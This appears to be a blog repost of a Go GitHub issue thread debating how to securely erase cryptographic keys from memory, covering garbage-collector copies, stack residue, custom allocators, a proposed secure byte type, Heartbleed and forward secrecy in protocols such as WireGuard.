Golang runtime/secret: add new package - Aurora Blog|java/go/python

Final API is here: https://github.com/golang/go/issues/21865#issuecomment-925145234

Forward secrecy is usually only a thing if it's possible to ensure keys aren't actually in memory anymore. Other security properties, too, often require the secure erasure of keys from memory.

The typical way of doing this is through a function such as explicit_bzero, memzero_explicit, or the various other functions that C library writers provide that ensure an optimization-free routine for zeroing buffers.

For the most part, the same is possible in Go application code. However, it is not easily possible to do so with crypto API interfaces that internally manage a key buffer, such as the AEAD interface.

In the Go implementation of WireGuard, @rot256 has been forced to resort to unholy hacks such as:

type safeAEAD struct {
    mutex sync.RWMutex
    aead  cipher.AEAD
}

func (con *safeAEAD) clear() {
    con.mutex.Lock()
    if con.aead != nil {
        val := reflect.ValueOf(con.aead)
        elm := val.Elem()
        typ := elm.Type()
        elm.Set(reflect.Zero(typ))
        con.aead = nil
    }
    con.mutex.Unlock()
}

func (con *safeAEAD) setKey(key *[chacha20poly1305.KeySize]byte) {
    con.aead, _ = chacha20poly1305.New(key[:])
}

Having to resort to this kind of reflection is a bit unsettling and something we'd much rather not do.

So, this issue is to request and track the addition of a consistent "Clear()" interface for parts of the Go crypto API that store keys in internal buffers.

Furthermore, even if real clearing is deemed to be an abject failure due to Go's GC, and one must instead mmap/mlock or use a library such as memguard, the AEAD interface still is inadequate, because it appears that SetKey winds up allocating its own buffer internally. So again, big problem.

cc: @agl

Comment From: dsnet

Related to #21374

Comment From: anitgandhi

Just as another example of what was mentioned at the end, even creating an AES block primitive causes an allocation right before key expansion, which shows wiping the key is inadequate, including how memguard does it.

https://github.com/golang/go/blob/master/src/crypto/aes/cipher.go#L46-L47

The key expansion is a deterministic process so once c.enc and c.dec are set, if the system was compromised such that memory could be scanned, even on a system where memguard is used, an attacker could get the contents of c.enc or c.dec, reverse the key expansion process, and now they have the original key. If I'm not mistaken, you could currently call aes.NewCipher(key) where key points to a memguard buffer, immediately wipe key, then continue to use the instantiated cipher "object" for calls to Encrypt and Decrypt calls, since now only the internally expanded key is required.

This comment explains that as well. Effectively, you'd have to create custom implementations of all the existing crypto code in the standard lib, supplementary x/crypto libs, even indirect packages like math/big would end up getting into scope.

In one sense, you'd have to replace make itself to using manually managed memory, like how memguard does it, but that of course is fundamental change to Golang itself, and would make the niceties of GC pointless

Comment From: FiloSottile

This is going to be extremely hard to obtain as a generic guarantee, for all the reasons mentioned here, at #21374 and at awnumar/memguard#3. In particular there is no way to retroactively enforce that an interface implementation does not copy key material on the heap (at least outside of the stdlib, and we don't want a security guarantee that breaks when you use external implementations).

But how about a smaller problem:

add a Wipe() method to the implementation (say chacha20poly1305); the method might exist or not based on the platform since implementations can differ, the application can decide to warn or bail out if Wipe() is unavailable by doing an interface-upgrade from AEAD, or not to compile at all by calling it directly on the concrete type
make an implementation with a Wipe() method guaranteed not to make copies of the key
if necessary, add a NewWithAllocator(makeSlice func(size int) []byte) function so that key material is placed in manually allocated memory exempt from GC and swapping (for example via memguard)
- alternatively, unsafe can be used to instantiate the chacha20poly1305 object, but then you'd need a Init() method

Would that solve your problem enough?

Comment From: FiloSottile

Actually, forget Wipe(), it makes no sense if you have NewWithAllocator(makeSlice func(size int) []byte) since you can just use the allocator wiping feature (which memguard offers). Moreover, if you don't have neither NewWithAllocator nor a #21374 solution, Wipe() is useless because of GC copies and swapping.

Comment From: yahesh

A possibility to reliably wipe secrets used by the crypto library would be highly appreciated. For example, gocryptfs has tried to solve this problem as far as is currently possible by wiping the memory locations it has access to.

However, as the crypto library creates copies of the encryption secrets by deriving encryption keys from the provided secrets it's currently not possible to completely wipe said secrets (and derived keys) from memory.

Comment From: gopherbot

Change https://golang.org/cl/162297 mentions this issue: crypto/rc4: remove false guarantees from Reset docs and deprecate it

Comment From: gopherbot

Change https://golang.org/cl/163438 mentions this issue: [release-branch.go1.12] crypto/rc4: remove false guarantees from Reset docs and deprecate it

Comment From: zx2c4

Here's a somewhat different proposal that doesn't require adding anything to the language syntax itself and should deal with interesting behind-the-scenes copies:

runtime.SetZeroOnGC(obj)

In a similar way as SetFinalizer attaches a function to an object, SetZeroOnGC could mark that object's memory as needing to be zeroed whenever the runtime frees it or moves it to a new location. Overtime this could grow nice optimizations too that aren't as easy with manual code; for example, if an object is being GC'd in order to serve an immediate allocation request with a default initial value, then the zeroing could be skipped.

CC @mknyszek @aclements

Comment From: awnumar

@zx2c4 interesting solution, but since the garbage collector isn't guaranteed to run this wouldn't really provide any reasonable guarantee of secrets being erased.

Comment From: zx2c4

@awnumar People who must have the memory zeroed now can of course call runtime.GC(). People with more relaxed requirements, "memory should get zerored sometime in the future", can opt not to do that. Notably that's the same semantic that people are used to having with SetFinalizer.

Comment From: awnumar

@zx2c4 I understand yet it seems like considerable extra architectural effort to add this functionality to the runtime without giving it more power in the form of some kind of security guarantees.

Comment From: zx2c4

Is this talk of "considerable extra architectural effort" true? I was hoping one of the garbage collector maintainers authors would chime in saying something like, "oh that sounds very easy! we'll look into it." Maybe we can wait for them to weigh in on that first?

And "giving it more power in the form of ..." already evaluates to runtime.GC() as I already pointed out. So I'm not sure what you mean.

Comment From: awnumar

@zx2c4 Calling runtime.GC() when? Every so often? Or just before we exit? What if we terminate unexpectedly?

Having to deal with an additional function call to ensure some security property holds adds complexity to every code path, and dealing with it can be non-trivial.

Comment From: zx2c4

I guess it's up to the user and the use case. If the requirement is just that "at some point in the future, it's zeroed", then don't call runtime.GC(). If instead there are specific key erasure points, then call it then.

Comment From: awnumar

If the requirement is just that "at some point in the future, it's zeroed"...

Seems like a weak security requirement. I can't think of a use-case for it.

If a feature is going to be added to tackle the problem that this issue is about, it had better do it properly or not do it at all.

Comment From: zx2c4

Looks like you convenient ignored the following sentence, which mentions the case of a different security requirement.

Comment From: yahesh

That's a strange way of looking at it. "Either we implement a perfect solution right away or we stay as insecure as we are at the moment!"

Comment From: randall77

Well, you can zero on GC right now with a finalizer:

type Secret struct {
    key [16]byte
}

s := &Secret{key: ...}
runtime.SetFinalizer(s, func(s *Secret) { s.key = [16]byte{} })

If/when Go has a copying GC*, then we would need to think about whether to zero the original copy of an object when it is moved. Maybe we just do that for every object. Maybe we recommend using the finalizer above, and only zero the original copy of things that have finalizers. (Kinda hacky overloading of semantics, but might work.)

I think this issue is asking for something more. In particular, Go exerts no control over what the OS does with heap-backed pages. It could write them to a swap file, for example. I think in general key management is going to require separate allocations for secrets anyway (specially mapped, on secure physical memory, etc.), so adding a mechanism for Go objects is only solving part of the key management problem.

*Go does have copying for stack-allocated objects. We don't currently zero the old copy of those objects. But you can force objects to be allocated off the stack by, for example, putting a finalizer on them.

Comment From: zx2c4

Well, you can zero on GC right now with a finalizer:

Right, sort of. My proposal is to add something that formalizes the possibility of that, via a specific call to runtime.SetZeroOnGC(obj).

Go exerts no control over what the OS does with heap-backed pages.

Having a specific marking means various facets of it can improve over time with future pull requests. For example, SetZeroOnGC could imply a call to mlock at some point, or whatever else is deemed necessary to make this fit the bill.

In other words, everyone agrees that proper zeroing in Go requires some cooperation from the runtime. Let's start that by adding a marking to the runtime.

Comment From: awnumar

Speaking from experience, the ability to provide a custom allocator to the runtime or within well-defined scopes, such as within a function or within a package, would be incredibly helpful. Currently in order to use secure APIs like crypto code requires manually rewriting parts of them to use specially allocated memory.

This is an evolving landscape and we're learning new things all the time about what works best and what does not. I don't personally see the value in a wrapper function for the finalizer: it adds no real new functionality to the table and it gives the impression of greater security than it provides.

Comment From: zx2c4

Speaking from experience, the ability to provide a custom allocator to the runtime or within well-defined scopes

That sounds interesting. Maybe open a separate PR for that alongside some syntactical (Go 2) or function proposals?

Comment From: randall77

The problem I see with runtime.SetZeroOnGC is that it's too late. You really want to tell the runtime that this object is special at allocation time, not some time after the allocation has happened.

Maybe some reflect.New-style API in the crypto package.

Comment From: zx2c4

The problem I see with runtime.SetZeroOnGC is that it's too late. You really want to tell the runtime that this object is special at allocation time, not some time after the allocation has happened.

Why does it matter? If you are referencing the object, it's necessarily before it's been GC'd, and so there's a chance to call runtime.SetZeroOnGC. Of course it means that individual temporary or unexported buffers from various modules will overtime need to be marked correctly, but that's fine and probably an evolutionary thing that can happen, mostly in crypto and x/crypto, I assume. If doing this in various places is deemed an unnecessary performance hit by those who don't want it, it's easy enough to make the whole thing opt-in, whereby SetZeroOnGC is globally a no-op until some other function is called or the like.

Comment From: randall77

If it is just SetZeroOnGC, then yes, you can do it after allocation. But for the larger key management problem, you want to tell the runtime "this contains a secret" at allocation time, so a special allocator of some sort can be used.

Comment From: zx2c4

Not sure I follow. For a "larger key management" situation, you call SetZeroOnGC on each piece of key material. If you're allocating it yourself, then you call it right after the new or make keyword. If you're getting it from somewhere else, then you call it when you get it.

It might be the case that you'd like to redirect allocations of an entire module to some totally separate allocator or something wild. That's fine and interesting, and I hope @awnumar will open an issue with a proposal for introducing that kind of multi-allocator machinery to Golang or something. That seems like an interesting parallel effort that might benefit from being spec'd out.

My proposal here is to add a simple flag to the current allocator to solve this problem in an smaller and evolutionary way that can improve overtime.

Comment From: randall77

It might be the case that you'd like to redirect allocations of an entire module to some totally separate allocator or something wild.

Maybe not an entire module, but the secret parts of it, yes.

I see SetZeroOnGC as only half a solution. Maybe it would help with simple security improvements, but anything really hardened will need a special allocator. There's no evolutionary path between the two (i.e. the implementation of SetZeroOnGC can't be upgraded to change where the allocation happens, because by the time you get to the call site, it is too late).

And we can do the simple security improvements that SetZeroOnGC can do today, with SetFinalizer.

Comment From: zx2c4

No, SetFinalizer is not sufficient, because of internal copies.

Comment From: randall77

What internal copies?

Comment From: FiloSottile

Over time I grew more and more skeptical about this.

Even if we went and tagged every single GC allocation that holds secrets or derivatives in all packages (which is a lot of pollution), the heap is only half the story. What about values on the stack? What about every single variable in a field implementation? Moreover, the boundary between stack and heap allocation is not specified in Go, so you'd have to tag everything to be safe.

That quickly devolves into a lot of complexity, for elusive gains, as you need all your dependencies to strictly apply tagging.

Are there no studies about this? I would want to see proof that languages which support this actually succeeded in developing an ecosystem that delivers actual security properties, before we embark on it. All I know about is from back when Heartbleed happened, and we found out that no, secrets were still all over memory.

Comment From: zx2c4

Indeed it's tough. For the kernel, I'm working on a gcc plugin that will zero out the stack frame of a function down to the depth of its deepest leaf, upon return from the marked top level parent.

But even without something like that on Go, I suspect most of the stack for my use cases will be probably clean of most intermediate values within a matter of minutes. Hours? Some interval? Importantly, not forever, or overly long.

Comment From: tv42

@randall77 I believe what was meant was internal copies that Go GC might in the future do. The internal copies the GC of another implementation of might have. There's never been a promise that the GC is not a moving GC. It'd be poor form to standardize an API that can't cope with that.

Comment From: ianlancetaylor

Presumably you know at allocation time that the value will hold something that should be scrubbed from memory. I think the only approach that is likely to work with the Go runtime is to use a separate allocator for those values, likely based directly on syscall.Mmap, and to implement the desired semantics directly. I think that writing a package that supports that would be more useful than trying to push the desired semantics into the Go runtime.

Comment From: awnumar

@ianlancetaylor I think you're right but this leaves us with a choice:

Rewrite libraries to use whatever custom data structure we end up with.
Overload allocators in packages in some way. This way would make things easier but less flexible, as the allocators would need to return fixed data types or pointers since the packages have no "awareness" of the capabilities of the container objects.

Option one doesn't need the runtime to help it but option two probably would as I'm not sure if this can be accomplished with pure Go.

Comment From: zx2c4

Another way of doing this, perhaps, is to add a mark to functions, which would cause all allocations made from it or leafs of it to be zeroed when GC'd or out of scope. This would help with both "stack zeroing" and with zeroing secrets that do explicitly escape upon their GC pass. Implementation-wise, entry into these functions would result in flipping a runtime switch to change allocator behavior/pool, as well as tracking maximum stackdepth for zeroizing.

Comment From: CAFxX

Over time I grew more and more skeptical about this.

Even if we went and tagged every single GC allocation that holds secrets or derivatives in all packages (which is a lot of pollution), the heap is only half the story. What about values on the stack? What about every single variable in a field implementation? Moreover, the boundary between stack and heap allocation is not specified in Go, so you'd have to tag everything to be safe.

And that's before considering that the OS and the hypervisor likely make no guarantees that the contents of a virtual page will not be moved/copied to a different physical page, potentially leaving old copies of the contents of your pages lying around, outside of your control.

Comment From: magicalo

While a Secure Erase might be possible today via homebrewing, there should be a runtime mechanism to do this instead of homebrew approaches using runtime.KeepAlive or other hacks.

It also means everyone has to build their own solution to do what the runtime is best suited to handle. Moreover, all of the private allocations in libraries are not really reachable so it means you can't reliably get at sensitive data that might be duped inside go libraries like http

Comment From: elagergren-spideroak

I'll add my two cents. To be clear, I'm not particularly for or against adding secure erasure. I would prefer to have a standardized API that's guaranteed to work across Go versions; that is, not DIYing it. But I also recognize that Go makes it difficult to really promise much.

Over time I grew more and more skeptical about this. Even if we went and tagged every single GC allocation that holds secrets or derivatives in all packages (which is a lot of pollution), the heap is only half the story. What about values on the stack? What about every single variable in a field implementation? Moreover, the boundary between stack and heap allocation is not specified in Go, so you'd have to tag everything to be safe.

And that's before considering that the OS and the hypervisor likely make no guarantees that the contents of a virtual page will not be moved/copied to a different physical page, potentially leaving old copies of the contents of your pages lying around, outside of your control.

While this is true, well-defined secure erase is useful for other reasons—like meeting certain regulations and standards. For example, NIAP requires one of the following for key destruction:

single overwrite consisting of 1.1. a pseudo-random pattern using the [CSPRNG] 1.2. zeros 1.3. ones 1.4. new value of a key
removal of power to the memory
destruction of reference to the key directly followed by a request for garbage collection

Speaking generally, that the OS copies pages around or that the compiler promises nothing is largely irrelevant. What NIAP cares about is that the security goals are explicitly outlined and the application takes well-defined actions to meet those goals.

Returning to the list, while (2) is universal it can be unusable for obvious reasons. And while Go can reasonably implement (3), it's stymied by the fact that it can be easy to (accidentally) have multiple references to a piece of memory. Plus, it's difficult to implement as a "generic" function, so developers end up having to do it manually. Of the three options, (1) is the easiest to use correctly and consistently.

The for-range "zeroing" idiom (which I think has been brought up on this thread) with runtime.KeepAlive accomplishes (1), but it only works for pointers to types or types with internal pointers (like slices). And it relies on the pinky promise that runtime.KeepAlive will prevent the compiler from eliding the for-loop.

The only other option is to use a C library, which isn't using Go at all!

I'm still not entirely sure I like this comparison, but to me asking users to manually securely wipe memory seems a bit like asking users to implement constant-time comparisons themselves. It can be a bit difficult to get correct. And then the developer has to ensure that their routines, which ostensibly rely on the compiler not optimizing them, work across Go versions. Thus, the stdlib's sutble package—which can be used even though other parts of the stdlib (like math/big) are not constant-time.

Comment From: magicalo

The way to do this is to have secure slice type that is allocated on the heap in a page that is segmented from other allocs. It would be an explict type []sbyte. The go runtime can ensure that this special type is properly managed on the heap and locked from the GC moving it. It would not be hard to if one wanted to solve this problem in a serious way. The sbyte type can be zero'd explicitly by a call to runtime.SecureErase at any time of the developers choosing as well as automatic zero on GC.

Comment From: davecheney

syscall.Mmap seems to fit most of those requirements.

Comment From: elagergren-spideroak

@davecheney well, minus the secure erase bit.

@magicalo I do not think it's fair to say that it "would not be hard." There are a bunch of questions that need to be answered and thought through:

What kind of type is []sbyte? Builtin? Named?
Depending on (1), from which package will it be allocated?
Is sbyte legal?
Depending on the answer to (4), can sbyte be converted to byte or uint8? What about the other way around?
Can []sbyte be used in APIs that require []byte? Otherwise, how can it be used with any existing APIs?
If yes to (5), what happens if you, e.g., append []sbyte to []byte? Does it use the system allocator or Go's allocator?
How does automatic GC work? The GC knows if a pointer is a valid Go heap or stack pointer, but how does it know that an arbitrary system pointer is []sbyte?
Can this new allocator—whatever it is—reuse []sbytes once they've been garbage collected?

And so on.

Comment From: FiloSottile

Ignoring the specifics of the proposals in this issue for a moment, it seems to me that they can be grouped in three categories:

mechanisms for wiping a memory region after using it (without getting optimized out by the compiler, and maybe doing it automatically like a finalizer)
ways to tag an allocation as sensitive, so it is wiped when it goes out of scope, as well as when it's copied by stack moving or a future moving GC
full taint analysis that tags any value derived from a sensitive value automatically, and until they are marked clean.

I am 100% convinced (1) is insufficient and we should not pursue it, as it's guaranteed to leave behind copies on the stack.

I am very skeptical about the usability of (2), which is already available as Mmap or memguard (although those have a performance cost because they preclude stack allocations). It requires manually catching every secret-equivalent intermediate value and I don't think teams of human programmers over time are well-suited to that task, like they aren't well-suited to manually managing memory. Before we commit to adding support for something like that in the language and/or adopt it in the standard library, I'd want to see examples of it working successfully in end-to-end application scenarios (where a key is read from somewhere, decoded, passed around, and used for encryption). There is no point in making the cryptographic libraries "secure" if no application manages to use them securely.

(3) is hard and an open research topic. I would be interested in proposals or pointers to existing designs, but it's not something we can can get done right away.

Comment From: magicalo

It is clear to me that everyone agrees this is needed. Lets start with that premise. 1) Is something needed? YES

How to best do it is certainly worth a discussion. In my mind having a Secure Byte type []sbyte that has all of the same behaviors as a []byte type - BUT is ensured to be allocated and destroyed in a such a way that it can be securely managed/erased is the goal here. It clearly has a broad appeal to any crypto implementation in Go and can be made to operate where the average developer only needs to know when to use it. Put your secrets in an []sbyte only and don't copy it into other types, etc. The []sbyte type hides the hard parts from the average developer and the runtime takes care of securely destroying the object when it goes out of scope.

Comment From: vparla

It is clear to me that everyone agrees this is needed. Lets start with that premise.

Is something needed? YES

How to best do it is certainly worth a discussion. In my mind having a Secure Byte type []sbyte that has all of the same behaviors as a []byte type - BUT is ensured to be allocated and destroyed in a such a way that it can be securely managed/erased is the goal here. It clearly has a broad appeal to any crypto implementation in Go and can be made to operate where the average developer only needs to know when to use it. Put your secrets in an []sbyte only and don't copy it into other types, etc. The []sbyte type hides the hard parts from the average developer and the runtime takes care of securely destroying the object when it goes out of scope.

I agree this is worth exploring and is certainly valuable.

Comment From: tv42

@magicalo

In my mind having a Secure Byte type []sbyte that has all of the same behaviors as a []byte type - BUT is ensured to be allocated and destroyed in a such a way that it can be securely managed/erased is the goal here.

If that type is magic, then that guarantee disappears immediately once you use any "normal" function that takes a []byte argument. Say, writing to a file. See "manually catching every secret-equivalent intermediate value" above.

Comment From: vparla

@tv42

If that type is magic, then that guarantee disappears immediately once you use any "normal" function that takes a []byte argument. Say, writing to a file. See "manually catching every secret-equivalent intermediate value" above.

Not if implemented correctly.
The point here is there is a need for something to solve this problem.
There are many ways of solving it even if it is not what is being suggested. Do you disagree with that ?

Comment From: tv42

@vparla

Not if implemented correctly.

Which is point 3 in https://github.com/golang/go/issues/21865#issuecomment-771559897 and goes well beyond "duh just add a type".

Comment From: FiloSottile

The most constructive way to make progress now would be to present proposals (ideally as separate issues) that address the points listed in https://github.com/golang/go/issues/21865#issuecomment-771559897.

A type derived from []byte is in the (2) category: it does not solve tracking intermediate values, and does not support any non-[]byte representations of secrets. (For example, the integers used internally in most cryptographic implementations.)

Simply because there is a need, it doesn't mean there is a solution, or that we should adopt any incomplete solution that we don't expect will actually fix the problem.

Comment From: vparla

@vparla

Not if implemented correctly.

Which is point 3 in #21865 (comment) and goes well beyond "duh just add a type".

I don't think anyone was saying "duh just add a type". Not sure what value that comment brings to the conversation either? Either way, I think there is usefulness in building this functionality into the runtime.
If it is too hard to do, then maybe the solution/system is not appropriate for these type of secure use cases and another technology should be used instead.

Comment From: rsc

Marked as proposal and adding to the minutes. But https://github.com/golang/go/issues/21865#issuecomment-771559897 seems like a clear reason this can't be accepted: what we know how to do isn't enough, and what's enough is impossible / impractical / we don't know how to do it.

Comment From: magicalo

Marked as proposal and adding to the minutes. But #21865 (comment) seems like a clear reason this can't be accepted: what we know how to do isn't enough, and what's enough is impossible / impractical / we don't know how to do it.

Not sure how to unpack this. We will consider it, but it is too hard so we won't do it? If that is the case then a disclaimer should be written that this technology is inherently insecure and cannot be made secure.

Comment From: rsc

This proposal has been added to the active column of the proposals project and will now be reviewed at the weekly proposal review meetings. — rsc for the proposal review group

Comment From: ianlancetaylor

@magicalo We would like to do it if we can, but, as far as we know, it is impossible.

I don't see that this implies that the technology is inherently insecure. Security must always be defined in terms of some sort of attacker. Key erasure is presumably intended to protect against an attacker who has the ability to read arbitrary memory in your process. I agree that securing a Go program against that level of attack is quite difficult. The same is true of many other languages.

Comment From: magicalo

So the statement you are making is that Go is inherently insecure and as such should not be used for servers that access sensitive data. Heartbleed is a great example of why sensitive data should not be left in memory any longer than actually needed. It is one of many examples that include other techniques such as memory dump analysis, etc.

Comment From: ianlancetaylor

I agree that long-running servers written in Go should not store sensitive data as Go values in process memory. And I claim that the same is true for many other languages. Even in C you have to think about kernel network buffers and kernel swap space. (And the mechanisms that C programs use to avoid those problems can also work for Go programs.)

That is not the same as saying that Go is inherently insecure.

Comment From: FiloSottile

Heartbleed is an excellent example of how this is an unsolved problem. OpenSSL always attempted to do secret clearing with mechanisms similar to the existing ones ones proposed here, and some providers even went further and used custom allocation arenas for secret values. They were all compromised by Heartbleed anyway, because there were always intermediate values scattered in memory to reconstruct the secrets from.

Comment From: magicalo

Heartbleed recovered private data that was not within OpenSSL. So this is a total mischaracterization of the exploit and the problem space.

Comment From: FiloSottile

See https://blogs.akamai.com/2014/04/heartbleed-update.html and the following updates.

Comment From: magicalo

The VUNERABILITY was in OpenSSL heartbeat mechanism. The memory recovered off of the devices was arbitrary memory that was not limited to the OpenSSL memory and often were keys and other sensitive data. This arbitrary memory often had data in it that was from earlier and complete unrelated to the active session and was not zero'd prior to be returned to the allocator.

Comment From: tv42

This arbitrary memory often had data in it that was from earlier and complete unrelated to the active session and was not zero'd prior to be returned to the allocator.

So, what FiloSottile said -- the key erasure mechanism they had wasn't comprehensive enough.

Comment From: magicalo

Who is 'they' ? The memory accesses was not OpenSSL memory. It was random memory on the system, reachable due to an OpenSSL bug.
This could include any number of underlying server technologies such as Java, C, PHP, whatever. No doubt mostly Java based at the time.

The fact that implementers were not good security practitioners is unremarkable and another problem entirely. Lets not conflate the two.

The lack of an ecosystem is the problem here and all the more reason to have a nice built-in type designated for handling sensitive data so that your average developer doesn't have to think about it. Make it simple and secure and just tell the developer to use the sbyte type for sensitive data.

Comment From: ianlancetaylor

But the secret data arrives from somewhere, and it lives in memory while it is arriving, in kernel network buffers or kernel file buffers if nowhere else. Or, the secret data is sent somewhere, and it lives in memory while it is being sent. And that memory is not controlled by Go. I don't understand how a Go sbyte type will avoid those vulnerabilities.

Comment From: zx2c4

Often times, secret data comes from /dev/urandom, for the purpose of doing ephemeral DH. In this case, the read syscall or the getrandom syscall presumably take pains to ensure these bytes are overwritten. Grep the kernel for memzero_explicit to see. Last line of this function, for example: https://github.com/torvalds/linux/blob/f40ddce88593482919761f74910f42f4b84c004b/drivers/char/random.c#L1066

Comment From: antichris

There is truth on both sides of the discussion.

It's certainly true, that a perfect implementation may very well be impractical and/or even technically impossible, like @FiloSottile and others on the Go team are warning. But it is also true that there are steps that can be taken to reduce the risk of sensitive material exposure, a reduction that may turn out significant or even sufficient for most if not all practical purposes, as @magicalo is arguing.

I think it all comes down to damage control, to reducing the risk, even if total elimination is unfeasible. I may be wrong, though, maybe it really makes more sense to do nothing at all; I'm willing to be swayed.

Comment From: FiloSottile

Security nihilism is definitely a trap to keep in mind, and we shouldn't give up on security as a whole simply because it's not possible to achieve perfect security, that is all true. However, that concept is much more useful when applied along the attacker class axis: it's fine to deploy protections that defend against some attackers but not others.

Here, it's not at all clear what attacker would be able to read process memory, but would be stopped by the fact that some of the copies of a secret were deleted. In what scenario do the partial solutions actually stop a compromise from happening? All partial solution (like the Akamai allocation arena that was supposed to protect OpenSSL secrets) turned out to be useless when Heartbleed happened.

It's not security nihilism to refuse to implement a measure that doesn't stop any real world attacker. In fact, it would be reckless to state that we provide a security property that we don't believe is actually available.

Another axis is application class: in https://github.com/golang/go/issues/21865#issuecomment-771559897 I didn't rule out (2) entirely, I asked to be pointed to examples of real applications that were made actually secure against realistic attackers by using a limited technique like memguard. I suspect they don't exist, but I am willing to be proven wrong! memguard is available right now, it's a little inconvenient to use, but it should be more than possible to use it like a secure []byte to show it would be useful.

Comment From: magicalo

I don't think one can in good conscience recommend Go in any software that handles sensitive data at this time.
I think a disclaimer or warning to this affect should be clearly stated on the Go doc pages.

Comment From: 0xmichalis

I don't think one can in good conscience recommend Go in any software that handles sensitive data at this time. I think a disclaimer or warning to this affect should be clearly stated on the Go doc pages.

Can you recommend a language to do what you are after?

Comment From: magicalo

I don't think one can in good conscience recommend Go in any software that handles sensitive data at this time. I think a disclaimer or warning to this affect should be clearly stated on the Go doc pages.

Can you recommend a language to do what you are after?

C / C++ it is possible to do this today and there are libraries that provide this capability, including secure enclave libraries.

Comment From: ianlancetaylor

How do C/C++ programs let you clear the contents of the secret data out of kernel file buffers or network buffers?

Comment From: zx2c4

When you generate random numbers, the kernel memzeros its temporary buffer after calling copy_to_user on it, and it also ratchets the RNG to prevent backtracking. This makes it possible to do forward secure ephemeral diffie-hellman in userspace, from a C or C++ or Rust or whatever program.

Usually those ephemeral keys you don't want to copy to disk (it's hard to erase SSDs) or send out over the network (they're private keys, after all).

Comment From: ianlancetaylor

Thanks, but that seems like a special case. Perhaps I am mistaken.

@odeke-em just pointed me at https://medium.com/edgelesssystems/ego-effortlessly-build-confidential-apps-in-go-dc2b1460e1bf. I don't know enough to judge how useful that is.

Comment From: zx2c4

Thanks, but that seems like a special case. Perhaps I am mistaken.

Sorry, but you are very mistaken. Forward secrecy is one of the primary security properties that you want from a cryptographic protocol. One of the oldest and most common ways of doing this is diffie-hellman with ephemerally generated keys. There is no shortage of popular protocols on the internet that make use of this -- TLS, SSH, Signal, WireGuard, .... In order for that property of forward secrecy to actually exist, you have to make sure old ephemeral private keys aren't sitting around in memory for some future attacker to dump. That means being able to effectively zero out the key in memory. With Go, this is currently not possible. That's a big problem.

Comment From: ianlancetaylor

I'm sorry, I don't understand. I asked about kernel network buffers. If you are using TLS, SSH, etc., then the data is going to live in kernel network buffers. You replied explaining that the RNG was cleared. That's great. But if the data also lives in network buffers, how are those cleared?

Comment From: FiloSottile

Jason is talking about the ephemeral keys that allow decryption of connection recordings. The plaintext eventually will mostly get overwritten for simple memory pressure, but if the keys are still around the recording can be decrypted. To be clear, I agree that guaranteed wiping of ephemeral DH values is desirable. I am sort of skeptical the kernel actually pulls it off for the random subsystem, but if we had a way to do our part we should. The point is that there isn't a reliable way to do this, in Go and in all other languages. It's not just the [16]byte that needs wiping, it's the stacks of all the ECDHE functions, the memory that held the derived symmetric key for the duration of the connection, the stacks of all the AEAD functions, the registers used for hardware-accellerated cryptography...

If one thinks that C/C++ make it possible, they can reach for memguard and do the exact same thing in Go. I don't believe it's sufficient at scale, and I don't know of better solutions.

Comment From: zx2c4

I'm sorry, I don't understand. I asked about kernel network buffers. If you are using TLS, SSH, etc., then the data is going to live in kernel network buffers. You replied explaining that the RNG was cleared. That's great. But if the data also lives in network buffers, how are those cleared?

The information that you transmit and receive in network buffers is encrypted information. How do you decrypt it? By having the key that was used to encrypt it. How is this key derived?

In protocols without forward secrecy it's derived from some long-term private key(s), usually living on disk somewhere. That means if you compromise that long-term private key at some point in the future -- say by hacking into a computer, or poking at memory from a hypervisor -- you can go back in time and decrypt all of the traffic you recorded during the two years prior.

So it's not good to use protocols without forward secrecy. On the contrary, for protocols with forward secrecy, in addition to those long-term private key(s), there's also short-term ephemeral keys mixed in. These are generated per-session, or per-time interval, or sometimes on every message, using random bytes from the system RNG. They never hit disk, they never are transmitted raw, and they're always zeroed out of memory after using them. This way, an attacker who compromises your box can't decrypt more than the current session in memory. All the others have been erased.

More concretely, WireGuard generates a new ephemeral every 2 minutes. If an attacker compromises your box, he shouldn't be able to decrypt more than the last few minutes of encrypted traffic. However, with Go, that guarantee no longer holds.

Comment From: zx2c4

I am sort of skeptical the kernel actually pulls it off for the random subsystem, but if we had a way to do our part we should.

Rather than throwing shade on one of the most security critical subsystems of the kernel, maybe you should point to real bugs if you see them so that I can fix those bugs. If you find zeroing leaks like that in random.c or its surrounding infrastructure (chacha.c and such), that's something I would really like to know about and fix. I don't take the attitude that, "awww it's too hard to get right, just give up". In the kernel, this is a more tractable problem than in Go.

The point is that there isn't a reliable way to do this, in Go and in all other languages. It's not just the [16]byte that needs wiping, it's the stacks of all the ECDHE functions, the memory that held the derived symmetric key for the duration of the connection, the stacks of all the AEAD functions, the registers used for hardware-accellerated cryptography...

I agree that the problem is extremely hard to solve in Go, but this doesn't apply to other languages as heavily. You can accomplish this in different settings. And again, with the exception of my Go code, if you find failures to do this in code that I maintain, I would like to know about it. This is a property I care about preserving.

If one thinks that C/C++ make it possible, they can reach for memguard and do the exact same thing in Go. I don't believe it's sufficient at scale, and I don't know of better solutions.

I don't think that's quite right. Memguard will give you a fixed region in Go. But as soon as you pass that memory off to any functions that deal with slices or copies or other variables, we're back at the same Go issue again. That's a different story from C or C++ where you can more carefully control how memory is moved around on the stack, zeroize buffers, and so forth.

Comment From: zx2c4

@ianlancetaylor @FiloSottile and others -- just to try to bring a bit of frankness back to this discussion, let's establish some things:

Zeroing memory is important for forward secrecy in cryptographic protocols.
Languages that are very low level have an easier job of doing this than languages that are higher level.
Nobody currently has any idea how to do this well, coherently, pervasively, and so on in Go.

Would you say that's an accurate description of where we are, or do you contest any of those statements? Assuming that's all correct, this seems to leave us with a hard-to-solve compiler problem. I'll try to summarize a few solutions discussed so far:

1) Introduce a []sbyte type, which the compiler won't copy around. Problem: why just byte? What if people need other types?

2) Introduce duplicates of all the types -- sbyte, sint -- or, similarly, add some attribute to type names (these amount to the same thing). Problem: does this then allow passing to functions that take non s-variety and the compiler does taint analysis? That seems hard to do. On the contrary, does it mean that we have to have two implementations of all functions? That also seems very hard to do.

3) Allocate using smake(...) to return memory that will be marked as tainted. Problem: is it possible to do efficient taint analysis like this?

I don't really know enough about this space of compiler design to assess these without lots of questions. For years, Go was blocked on generics until some experts came up with something that looked within reach and desirable, and now in retrospect it seems so obvious. With memzeroing, I view us as currently in that preceding stage: not enough current expertise or a spark of an idea to figure how best to implement it.

So it is not implemented. And that's an understandable predicament.

But it isn't because "memzeroing is not useful for cryptography" or "no program anywhere does it well anyway" or "that is necessarily an intractable problem" or reasoning along those grounds. It's just a hard problem to solve right in Go.

Comment From: ianlancetaylor

Thanks for the explanation. Sorry I don't know much about this stuff.

